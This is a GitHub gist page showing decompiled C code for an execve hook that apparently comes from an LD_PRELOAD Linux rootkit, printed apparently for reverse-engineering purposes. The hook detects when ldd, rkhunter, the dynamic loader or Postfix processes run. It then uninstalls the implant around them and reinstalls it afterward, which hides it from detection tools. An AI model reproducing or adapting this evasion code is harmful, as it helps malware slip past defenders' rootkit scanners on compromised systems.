Skip to content

Instantly share code, notes, and snippets.

@darrenmartyn

darrenmartyn/execve_hook.c Secret

Created November 25, 2021 14:34
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 1 You must be signed in to fork a gist
  • Save darrenmartyn/1c67cbbee5b58eba3f4689b1724e2e7e to your computer and use it in GitHub Desktop.
Save darrenmartyn/1c67cbbee5b58eba3f4689b1724e2e7e to your computer and use it in GitHub Desktop.
Download ZIP
Raw
execve_hook.c
int execve(char *__path,char **__argv,char **__envp)
{
char *pcVar1;
char *pcVar2;
__pid_t _Var3;
int iVar4;
int local_c;
pcVar1 = getenv("LD_TRACE_LOADED_OBJECTS");
if (old_execve == (code *)0x0) {
old_execve = (code *)dlsym(0xffffffff,"execve");
}
pcVar2 = strstr(__path,"ldd");
if (pcVar2 == (char *)0x0) {
pcVar2 = strstr(__path,"rkhunter");
if (pcVar2 == (char *)0x0) {
pcVar2 = strstr(__path,"ld-linux");
if ((pcVar2 == (char *)0x0) && (pcVar1 == (char *)0x0)) {
pcVar1 = strstr(__path,"postmulti-script");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"showq");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"tlsproxy");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"pickup");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"pipe");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"qmqpd");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"postfix-script");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"spawn");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"dnsblog");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"smtp");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"proxymap");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"lmtp");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"tlsmgr");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"verify");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"nqmgr");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"discard");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"post-install");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"master");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"oqmgr");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"cleanup");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"trivial-rewrite");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"virtual");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"qmgr");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"local");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"postscreen");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"bounce");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"anvil");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,
"postfix-wrapper");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"flush");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"smtpd");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"error");
if (pcVar1 == (char *)0x0) {
pcVar1 = strstr(__path,"scache");
if (pcVar1 == (char *)0x0) {
iVar4 = (*old_execve)(__path,__argv,
__envp);
return iVar4;
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
}
mdma_uninstall();
_Var3 = fork();
if (_Var3 == -1) {
/* WARNING: Subroutine does not return */
exit(1);
}
if (_Var3 == 0) {
(*old_execve)(__path,__argv,__envp);
/* WARNING: Subroutine does not return */
exit(0);
}
sleep(5);
mdma_install();
/* WARNING: Subroutine does not return */
exit(0);
}
}
}
mdma_uninstall();
_Var3 = fork();
if (_Var3 == -1) {
/* WARNING: Subroutine does not return */
exit(1);
}
if (_Var3 == 0) {
(*old_execve)(__path,__argv,__envp);
/* WARNING: Subroutine does not return */
exit(0);
}
waitpid(_Var3,&local_c,0);
mdma_install();
/* WARNING: Subroutine does not return */
exit(0);
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment